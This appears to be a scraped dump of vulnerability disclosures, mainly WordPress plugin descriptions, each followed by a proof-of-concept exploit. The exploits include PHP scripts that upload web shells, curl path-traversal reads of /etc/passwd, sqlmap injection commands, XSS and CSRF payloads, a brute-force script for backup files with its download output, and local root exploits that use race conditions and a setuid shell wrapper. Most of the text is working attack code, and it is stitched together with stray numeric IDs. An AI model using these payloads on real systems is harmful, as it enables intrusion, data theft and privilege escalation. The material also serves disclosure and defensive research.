$ make ibm-console.so
/tmp/x is :
#!/bin/sh
chmod 777 /etc/passwd
$ ./fsnoop -p ibm-consoleinst.so
[+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **
[+] ./ibm-consoleinst.so: payload=[0xb77775fb] file=[/tmp/consoleinst-HEREPID.sh]
[+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"
[+] ./ibm-consoleinst.so: Exploitation done.
[+] ./ibm-consoleinst.so: Unloading module.
ls -l /etc/passwd
-rwxrwxrwx 1 root root 1901 Nov 22 2014 /etc/passwd
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
char title[] = "** IBM Console Install Exploit **";
/* filters */
char proc_name[] = "/bin/sh ./consoleinst.sh";
char file[] = "/tmp/consoleinst-HEREPID.sh";
/* Evil routines */
void payload() {
int fd;
/*from v14dz: I use a fifo here, to unlock the paymod execution right after the cp command*/
mkfifo(file, 0666);
fd = open(file, O_RDONLY);
rename(file, "/tmp/a");
rename("/tmp/x", file);
}
wp-championship is a plugin for wordpress letting you play a guessing game of a tournament e.g. soccer.
Untested: $ sqlmap -u 'http://wp.site:80/wp-admin/wp-championship/cs_admin_users.php&userid=' --data="isadmin=1&user" --cookie=AUTH_COOKIE_HERE --level=5 --risk=3
MyPixs is a simple, yet powerful JavaScript and PHP application that gives you the possibility to display a lot of photos on your blog.
curl http://example.com/wp-content/plugis/mypixs/mypixs/downloadpage.php?url=/etc/passwd
Csv2WPeC Coupon provides an easy way to import and export WP e-Commerce Coupon items from and to a CSV file.
<?php
echo "Running PoC against target site<br>";
$uploadfile="/var/www/s.pht";
$ch =
curl_init("http://192.168.0.47/wp-content/plugins/csv2wpec-coupon/csv2wpecCoupon_FileUpload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('UPLOAD_DIR'=>'/usr/share/wordpress/wp-content/uploads/','OP_TYPE'=>'shell','DATA_KEY'=>1,'shell_file'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'s.pht'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
DukaPress is open source software that can be used to build online shops quickly and easily. DukaPress is built on top of WordPress, a world class content management system. DukaPress is built to be both simple and elegant yet powerful and scalable.
Automatically insert Google Adsense ads and Hotel Reservations.
<?php
$target_url = 'http://www.example.com/wp-content/plugins/google-adsense-and-hotel-booking/proxy.php';
echo "POST to $target_url";
$post = array('url' => $target_url,'url'=>$target_url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "#####################################";
echo $result;
echo "#####################################";
?>
Easy, Flexible Audio for WordPress.
$ curl http://www.example.com/wp-content/plugins/mp3-jplayer/download.php?mp3=.
WordPress True Fullscreen (WPTF) Gallery is a modern gallery plugin that supports true fullscreen and have a lot of features built with it.
$ curl http://www.example.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
Manipulate your wordpress images using slider and tickboxes.
curl -sk "http://www.vapidlabs.com/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"
Indonesian shipping special plugins to integrate with the plugin WP - Ecommerce. The final test at the WP - Ecommerce version 3.8.11.1 With WPE Indoshipping then you can display a list of postage per area in Indonesia that you choose . Suitable to display a list of postage from JNE , TIKI or the other and will directly affect the value of your order .
<?php
$uploadfile="/var/www/shell.php";
$ch =
curl_init("http://example.com/upload-file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('uploadfile'=>"@$uploadfile",'upload_path'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'shell.php'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
$ curl -v "http://www.example.com/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd
This plugin allows you to easily add a candidate application form to a job vacancy post, which allows the candidate to apply for the vacancy.
$ curl http://www.example.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
Members can upload and download files, create directories up to unlimited level.
<?php
/*
Exploit for wp-front-end-repository remote shell upload.
Larry W. Cashdollar, @_larry0
7/11/2015
*/
$uploadfile="/var/www/shell.php";
$ch =
curl_init("http://www.vapidlabs.com/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'shell.php'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Creates a downloadlink with the browsers SaveAs dialog for all available filetypes. A download counter can be shown on the post and admin area.
$ curl "http://www.vapidlabs.com/wp-content/plugins/filedownload/download.php?path=http://www.google.com" http://www.vapidlabs.com/wp-content/plugins/filedownload/download.php?path=www.google.com&referer="><script>alert(1);</script>
Add images to your blog posts from a URL in a flash. Skip the download/upload steps and the slow WordPress dialog box.
$ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://192.168.0.2/shell.php Shell location is reported back to the user with random filename. The url site must not interpret php, but allow it for download.
MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.
<?php
/*Larry W. Cashdollar @_larry0
Exploit for mailcwp v1.99 shell will be called 1-shell.php.
7/9/2015
*/
$target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';
$file_name_with_full_path = '/var/www/shell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('file' => 'shell.php','file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
The vendor patch for this vulnerability only requires that the user have a login on the wordpress site before exploiting this vulnerability. curl -F "file=@/tmp/shell.pht" "http://example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1" -F "upload_dir=/usr/share/wordpress/wp-content/uploads" --cookie cookie.txt
IBS Mappro is a comprehensive map creator, editor, and view generator based on the Google Maps API v3 and supports kml, kmz, and gpx map files.
http://example.com/wp-content/plugins/ibs-mappro/lib/download.php?file=/etc/passwd
Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders.
$ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd
Image Export plugin can help you selectively download images uploaded by an administrator .
$ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
$ curl "http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
MDC YouTube Downloader allows visitors to download YouTube videos directly from your WordPress site.
$ curl http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd
fixed in 2.1.1.
This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible wiht iphone and ipads. It is also allow us to use it as a widget.You can also enable this Powerplay Gallery on your wordpress site by placing code snippet in your template (.php) files. It shows flash gallery for desktops and touch enabled version for ipad and iphones.
<?php
/*Remote shell upload exploit for wp-powerplaygallery v3.3 */
/*Larry W. Cashdollar @_larry0
6/27/2015
albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
but you can enumerate these by using curl, and looking for redirect 301 responses:
e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
->301 exists else 404 doesn't.
shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
*/
$target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
$file_name_with_full_path = '/var/www/shell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3
Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.
$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3
Download all attachments from the post into a zip file.
http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd
WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration file, easily from one page.
curl --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=." http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip
Simple and lightweight plugin to add a "Download" button to your posts, pages or custom post types.
http://www.example.com/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/
$target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/
upload.php';
$file_name_with_full_path = '/var/www/shell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.
$ curl http://www.vapidlabs.com/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
Gmedia Gallery is a fully integrated Image, Music, Video Gallery WordPress plugin with a powerful admin panel.
Open Proxy: http://www.vapidlabs.com/wp-content/plugins/grand-media/assets/image-editor/camanjs/proxies/caman_proxy.php?camanProxyUrl=http://192.168.0.2/banner3.jpeg Local Image Files: http://www.vapidlabs.com/wp-content/plugins/grand-media/assets/image-editor/camanjs/proxies/caman_proxy.php?camanProxyUrl=/tmp/loader.gif
122811
XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!
TBD
A mood board is a type of collage consisting of images, text, and samples of objects in a composition. They may be physical or digital, and can be "extremely effective" presentation tools.
http://www.vapidlabs.internal/wp-content/plugins/adsense-click-fraud-monitoring/phpwhois/whois.php?query=%27%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&output=nice
122368
Prevents to be banned and excluded from your AdSense account due to malicious or unintended third party clicks on advertisements on your website.
http://www.vapidlabs.internal/wp-content/plugins/adsense-click-fraud-monitoring/phpwhois/whois.php?query=%27%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&output=nice
VideoWhisper Video Consultation is a web based video communication solution designed for online video consultations, interactive live presentations, trainings, webinars, coaching and online collaboration with webcam support. Read more on WordPress Video Presentation plugin home page.
<?php
$uploadfile="upexp.phtml";
$ch =
curl_init("http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('vw_file'=>"@$uploadfile",'name'=>'upexp.phtml','room'=>'.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
upexp.phtml
<?php
phpinfo();
?>
The executeable should be located in wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads.
VideoWhisper Video Conference is a modern web based multiple way video chat and real time file sharing tool. Read more on WordPress Video Conference plugin home page.
<?php
$uploadfile="upexp.phtml";
$ch =
curl_init("http://target_site/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('vw_file'=>"@$uploadfile",'name'=>'upexp.phtml','room'=>'.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
upexp.phtml
<?php
phpinfo();
?>
The executeable should be located in wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads.
This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically.
$ while (true) do ps -ef |grep [p]assword; done
118579
SEANux 1.0 is a linux distribution Available here developed by the Syrian Electronic Army. The distribution is focused on penetration testing and contains custom tools the SEA has developed.
<!-- PoC for http://www.vapid.dhs.org/blog/01-23-2015/
Larry W. Cashdollar
@_larry0
2/9/2015
--!>
<html>
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
<script>
$(document).ready(function(){
$.post("http://localhost/tools/Exe.php",
{
cmd: "touch /tmp/hello",
execute: "Execute"
},
function(data,status){
alert("Data: " + data + "\nResult: " + status);
});
});
</script>
</head>
<body>
<h2>
Hello! You just executed the "touch /tmp/hello" command as www-data on your SEANux 1.0 installation.
</h2>
<hr>
<br>
<a href="http://www.vapid.dhs.org/blog/01-23-2015/">Details Here</a>
</body>
</html>
117796
Allows you to optimize database, repair database, backup database, restore database, delete backup database , drop/empty tables and run selected queries. Supports automatic scheduling of backing up, optimizing and repairing of database.
113508 113507 113509
NextCellent Gallery provides a powerful engine for uploading and managing galleries of images, with the ability to batch upload, import meta data, add/delete/rearrange/sort images, edit thumbnails, group galleries into albums, and more. It also provides two front-end display styles (slideshows and thumbnail galleries), both of which come with a wide array of options for controlling size, style, timing, transitions, controls, lightbox effects, and more.
106474
XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!.
All input fields I believe are vulnerable, I’ve chosen the backup filename and a wget of sh.txt which is simply <?php passthru($_GET)?> into a writeable directory by www-data.
#!/bin/bash
#Exploit to download XCloner v3.1.1 Database backups
#Larry W. Cashdollar, @_larry0
#XCloner recommends a backup storage path under the WP root directory
#it uses a 0 size index.html file to block indexing.
#we can try to brute force the filenames it creates.
MONTH=10
DAY=30
#May need to set the DOMAIN to $1 the target depending on how WP is configured.
DOMAIN=
for y in `seq -w 1 24`; do
for x in `seq -w 1 59`; do
CPATH="http://$1/administrator/backups/backup_2014-"$MONTH"-"$DAY"_"$y"-"$x"_$DOMAIN-sql-nodrop.tar";
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Location $CPATH Found";
echo "[+] Received $RESULT";
echo "Downloading......";
wget $CPATH
fi;
done
done
lwc@wordpress:~$ bash exp.sh 192.168.0.26
[+] Location http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar Found
[+] Received HTTP/1.1 200 OK
Downloading......
--2014-10-30 13:02:51-- http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar
Connecting to 192.168.0.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44400640 (42M) [application/x-tar]
Saving to: `backup_2014-10-30_06-27_-sql-nodrop.tar.1'
100%[========================================>] 44,400,640 56.9M/s in 0.7s
2014-10-30 13:02:52 (56.9 MB/s) - `backup_2014-10-30_06-27_-sql-nodrop.tar.1' saved [44400640/44400640]
[+] Location http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar Found
[+] Received HTTP/1.1 200 OK
Downloading......
--2014-10-30 13:02:52-- http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar
Connecting to 192.168.0.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44400640 (42M) [application/x-tar]
Saving to: `backup_2014-10-30_06-33_-sql-nodrop.tar.1'
100%[========================================>] 44,400,640 64.1M/s in 0.7s
2014-10-30 13:02:53 (64.1 MB/s) - `backup_2014-10-30_06-33_-sql-nodrop.tar.1' saved [44400640/44400640]
114176 114177 114178 114179 114180
This plugins allows you to rename physically the media files by updating their titles. It also updates theirs links in the posts automatically.
102768
**Run over 60 servers with over 70 protocols!** Now you can run a CVS, DC Hub, DHCP, UPnP, DNS, DDNS, eDonkey, Email (POP3 / SMTP), FTP Proxy, FTP, FTPS, FTPES, Flash Policy, Git, Gopher, HTTP Snoop, ICAP, IRC Bot, IRC, ISCSI, Icecast, LPD, Load Balancer, MQTT, Memcached, MongoDB, MySQL, NFS, NTP, NZB Client, Napster, PHP and Lighttpd, PXE, Port Forwarder, Proxy, RTMP, Remote Control, Rsync, SIP, SMB/CIFS, SMPP, SMS, Socks, SFTP, SSH, Server Monitor, Stomp, Styx, Syslog, TFTP, Telnet, Time, Trigger, Unison, UPnP Port Mapper, VNC, VPN, Wake On Lan, Web, WebDAV, WebSocket, X11 and/or XMPP server! Start a server easily on the 'Simple' tab or go advanced and add users, allowed IP's, rules and more! Multiple servers can be run at the same time! No root needed, exceptions mentioned below. **Over 16 network tools!** Trial: This app will work for 14 days after which you will need to buy the paid version. You can also only add two servers in this app. Unfortunately we need to do this to support development. **Remote control support!** Server limitations: - Port Forwarder: root needed. - VNC Server: root needed and doesn’t work on most devices. - Samba Server: won’t work on Windows. - CVS, UPnP, Email, PHP, Lighttpd, MySQL, Rsync, VNC Server: only one server of this type can run at the same time. - ARM based: PHP, Lighttpd, MySQL, CVS, Rsync, VNC, SSH command line, Port forward, MySQL monitor, Traceroute **Includes a PHP Server!** Note: - The permission for receiving and sending SMS are for the optional SMS Gateway Server. **Light or dark Holo theme!** A few general features: - Encryption for settings and password login support! - Tasker and Llama support! - Start / Stop servers automatically using WIFI / SMS / call / power or cronjob rules! Or use the 'Trigger Server' for more! - Set a port, network interface to listen on, backlog, logging (to file), etc. And if rooted set a port below 1024. - Widget support! - A lot more! **Change your device to a NAS Server, dedicated server and/or honeypot! Network tools: - Remote Control Client - Simple shtaccess editor - Connectability - IP Calculator (IPv4 / IPv6) - Port Scanner - MySQL Monitor - Whois - Raw socket (TCP / UDP) - Command line - Ping - Network speed - HTTP Headers - Wake On LAN (WOL) - Lookup (DNS, IP, Host, Mac to Vendor) - Traceroute - UPnP Port Mapper Servers: - CVS Server - DC Hub Server (Direct Connect Hub) - DHCP Server - DHCP Proxy Server - DHCP Relay Server - UPnP Server - DNS Server - DNSMasq Server - Dynamic DNS Updater: DDNS services ChangeIP, DNSdynamic, DNSexit, DNSMadeEasy, DNS-O-Matic, DNSPark, DtDNS, DynDNS, easyDNS, eNom, Namecheap, No-IP, ZoneEdit, etc - eDonkey Server - Email Server: POP3, SMTP - FTP Proxy Server - FTP Server - FTP Root Server - FTPS Server - FTPES Server - Flash Policy Server - Git Server - Gopher Server - HTTP Proxy Server - HTTP Snoop Server - ICAP Server - IRC Bot - IRC Server - ISCSI Server - Icecast Server - Load Balancer Server - LPD Server (Printer Server) - MQTT Server - Memcached Server - MongoDB Server - Multicast DNS Server (Bonjour) - MySQL Server - NFS Server - NTP Server - NZB Downloader Client - Napster Server - PHP Server and Lighttpd Server (optional PHPMyAdmin, PHPFileManager, etc) - Port Forwarder - Proxy Server - PXE Server (Network Boot) - Remote Control App Server - Rsync Server - RTMP Server - RTMP Proxy Server - SIP Server - SMB / CIFS Server (Samba) - SMPP Server - SMS Gateway - SOCKS Server - SSH Server - SCP Server - Server Monitor - SFTP Server - Stomp Server - Styx Server - Syslog Server - TFTP Server - Telnet Server - Test Server: Echo, Discard, CHARGEN, QOTD - Time Server - Trigger Server - Unison Server - UPnP Port Mapper - VNC Server - VPN Server - Wake On LAN clien Visit us on: http://www.icecoldapps.com/ Follow us on Twitter: https://twitter.com/IceColdApps Like us on Facebook: http://www.facebook.com/IceColdApps
98151
Generates thumbshots of URLs by using Webkit and QT4.
91839
thttpd is a simple, small, portable, fast, and secure HTTP server.
60381 23828
Send your application errors to our hosted service and reclaim your inbox.
Sprout is a modular set of tools that take the tedium and frustration out of creating and managing programming projects by automatically installing and configuring external tools, libraries, commands and build tasks. Bundles are currently available to support ActionScript 2, ActionScript 3, Flex and AIR development.
100598
A Ruby implementation of SFP agent.
105971
Sounder is a ruby gem API for Mac OSX's afplay command.
irb(main):098:0> @file = "\"id;/usr/bin/id>/tmp/p;\""
=> "\"id;/usr/bin/id>/tmp/p;\""
irb(main):099:0> system %{/bin/echo "#{@file}" }
id
sh: 1: : Permission denied
=> false
irb(main):100:0>
larry@underfl0w:/tmp$ cat /tmp/p
uid=1000(larry) gid=600(staff) groups=600(user)
96278
Opens arbitrary text in your browser.
nobody () pitter:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/browser.html; done
Will pop up a java script alert in other gem users browser.
93490
Captures screenshots of web pages.
107783
SAP DB is a Free Enterprise database (http://www.sapdb.org). An exploitable race condition exists during installation that can be won to yield root to a local malicous user. An executable is world writeable before a setuid bit is set by the installation program. This condition exists for both the production version 7.3.0.29 and the beta version 7.4.3.7 beta (www.sapdb.org/tgz_linux.htm).
#!/bin/perl
while (1) {
$test =`grep -sh PRECOM.ins /tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST*`;
if ( $test =~ /PRECOM/ ) {
system("cp /home/lwc/run /usr/sapdb/depend/pgm/lserver");
exit(1);
}
}
/*##Larry W. Cashdollar, lwc@vapid.dhs.org
##This is just a wrapper to boost our privs from euid(0) to uid(0) guid(0) */
#include <stdio.h>
#include <unistd.h>
int
main (void)
{
char *shell[2];
shell[0] = "sh";
shell[1] = NULL;
if (!setreuid (0, 0))
printf ("We have root, getting sgid perms and spawning shell.\n"); else
{
printf ("Ack, We lost the race.\n");
_exit (0);
}
setregid (0, 0);
execve ("/bin/sh", shell, NULL);
return(0);
}
11915
This is an ios ruby app,you can learn,run,share ruby script. Features : Autocomplate. Auto Indent. Code color. In(the built-in browser or the txt editor),Select the text to run. Horizontal screen development. Code templates, the contents of the new file is copy from contents of the template file. You can enter ruby code by keyboard or two-dimensional code, and then you can execut the ruby code,support the gets function. You can adjust the code color and font size, and support to move the cursor left and right and up and down , easy to read and write. You can upload learning materials to the local on the computer via wifi, support http and ftp two upload ways. The file system supports txt, pdf, chm, mp3,m4v,zip, gif, png, html, rb, doc ... You can find learning materials by the built-in browser. You can save ruby code and learning materials, and can be modified to the save file and delete the save file . You can control the background image and color, and execution voice, background animation, text color and shadow, switch interface animation, the number and the order of the main interface of the tab bar to create your learning software. You can Learn ruby knowledge, the system provides some basic learning materials. You can use ruby code or learning materials to generate two-dimensional code , for easy sharing . You can share code by Email,Weibo,Twitter,Facebook. You can use the counter,light in the Setting tab.
97201
This app is a SSH terminal server AND an SFTP file server.
110742
A simple Ruby wrapper around gpg command for file encryption. rgpg is a simple API for interacting with the gpg tool. It is specifically designed to avoid altering global keyring state by creating temporary public and secret keyrings on the fly for encryption and decryption.
larry@sp0rk:~$ cat /bin/run #!/bin/sh echo "Command Injection" > /tmp/rci.txt irb(main):027:0* Rgpg::GpgHelper.encrypt_file 'mykey.pub', 'myfile.txt', 'myfile.txt.enc&run' => nil irb(main):028:0> gpg: keyring `/tmp/gpg-key-ring20130804-2970-1et1k4c' created gpg: processing message failed: eof After above completes: larry@sp0rk:~$ ls -l /tmp/rci.txt -rw-rw-r-- 1 larry larry 18 Aug 4 11:12 /tmp/rci.txt larry@sp0rk:~$ cat /tmp/rci.txt Command Injection larry@sp0rk:~$
95948
Python Interpreter is a native python development application for the iPad/iPhone. It is available for iOS 4 and above.
96719
The aim of pServ (pico Server) is to create a portable, small webserver. Coded in portable C with Unix being the main reference platform, but porting is encouraged. Portability and small footprint should enable the use of pServ on a workstation as well as
#include <stdlib.h>
#include <stdio.h>
int
main (int argc, char *argv[])
{
int i;
char buffer[300];
bzero (buffer,300);
for (i = 0;i<= atoi(argv[1]);i++) buffer[i] = 'X';
for (i=0;i<=atoi(argv[2]);i++)
buffer[i+atoi(argv[1])] = 'A';
printf("GET /%s HTTP/1.0\r\n",buffer);
}
102214
The Firebird(tm) database engine is derived from the InterBase(r) product currently owned by Borland. The documentation forInterBase v 6.0 applies also to the current FireBird release. InterBase documentation is available in Adobe Acrobat format from http://info.borland.com/techpubs/interbase/." The "information database" stored in the file isc4.gdb is read and writeable for all users with the default rpm installation of Firebird-1.0.3 for Linux.
2259 6219
CLI client for the PointHQ DNS Hosting System.
108577
To create colorful dial keyboard- each dial button to display different colors ! You can rotate or scale or move picture when you edit background image , you can set the picture fuzzy, long press(2 seconds) to change back image to the window size , try quickly! You can set different colors for different groups! You can set friend's head image by click the friend head in the friend table! You can organise your contacts , support the same name ,no name , no number , no e-mail.
This is an ios perl app,you can learn,run,share perl script. Features : Autocomplate. Auto Indent. Code color. In (the built-in browser or the txt editor), Select the text to run. Horizontal screen development. Code templates, the contents of the new file is copy from contents of the template file. You can enter perl code by keyboard or two-dimensional code, and then you can execut the perl code,support the gets function. You can adjust the code color and font size, and support to move the cursor left and right and up and down , easy to read and write. You can upload learning materials to the local on the computer via wifi, support http and ftp two upload ways. The file system supports txt, pdf, chm, mp3,m4v,zip, gif, png, html, rb, doc ... You can find learning materials by the built-in browser. You can save perl code and learning materials, and can be modified to the save file and delete the save file . You can control the background image and color, and execution voice, background animation, text color and shadow, switch interface animation, the number and the order of the main interface of the tab bar to create your learning software. You can Learn perl knowledge, the system provides some basic learning materials. You can use perl code or learning materials to generate two-dimensional code , for easy sharing . You can share code by Email,Weibo,Twitter,Facebook. You can use the counter,light in the Setting tab.
97200
PatchLink Update provides rapid, accurate and secure patch management, allowing you to proactively manage threats by automating the collection, analysis and delivery of patches throughout your enterprise. PatchLink Update significantly decreases the costs involved in securing your organization from worms, Trojans, viruses and other malicious threats.
#/bin/perl
while(1){
`echo "chmod 777 /etc/shadow" > /var/tmp/runme`;
}
41152
PatchLink Updateâ„¢ provides rapid, accurate and secure patch management, allowing you to proactively manage threats by automating the collection, analysis and delivery of patches throughout your enterprise. PatchLink Update significantly decreases the costs involved in securing your organization from worms, Trojans, viruses and other malicious threats.
nobody:/tmp> ln -s /etc/shadow patchlink.tmp After logs are rotated /etc/shadow will be size 0, since patchlink.tmp is removed by logtrimmer after the log rotation process has finished.
41152
Send deploy notifications to Newrelic service when deploying with Paratrooper.
101839
Send deploy notifications to Pingdom service when deploying with Paratrooper.
101847
Oracle Exadata is the only database machine that provides extreme performance for both data warehousing and OLTP applications, making it the ideal platform for consolidating on private clouds. It is a complete package of servers, storage, networking, and software that is massively scalable, secure, and redundant. With Oracle Exadata customers can reduce IT costs through consolidation, store up to ten times more data, improve performance of all applications, deliver a faster time-to-market by eliminating systems integration trial and error, and make better business decisions in real time.
86621 86620
The open office desktop suite.
As a normal user:
lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf
will result in the password file being over written with:
# create the proper autoresponse file
<file>
cat << EOF > /tmp/${USER}autoresponse.conf [ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oohome
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>
[JAVA]
JavaSupport=preinstalled_or_none
EOF
</file>
33970
The Wordpress CMS has persisent XSS in media library admin panel. This is a duplicate already discussed here https://core.trac.wordpress.org/ticket/21917
https://core.trac.wordpress.org/ticket/21917
P-DB-Backup allows you easily to backup your core WordPress database tables. You may also backup other tables in the same database.
#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite
DATE="20141031"; #Date to search
if [ ! -e rainbow ]; then
cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path
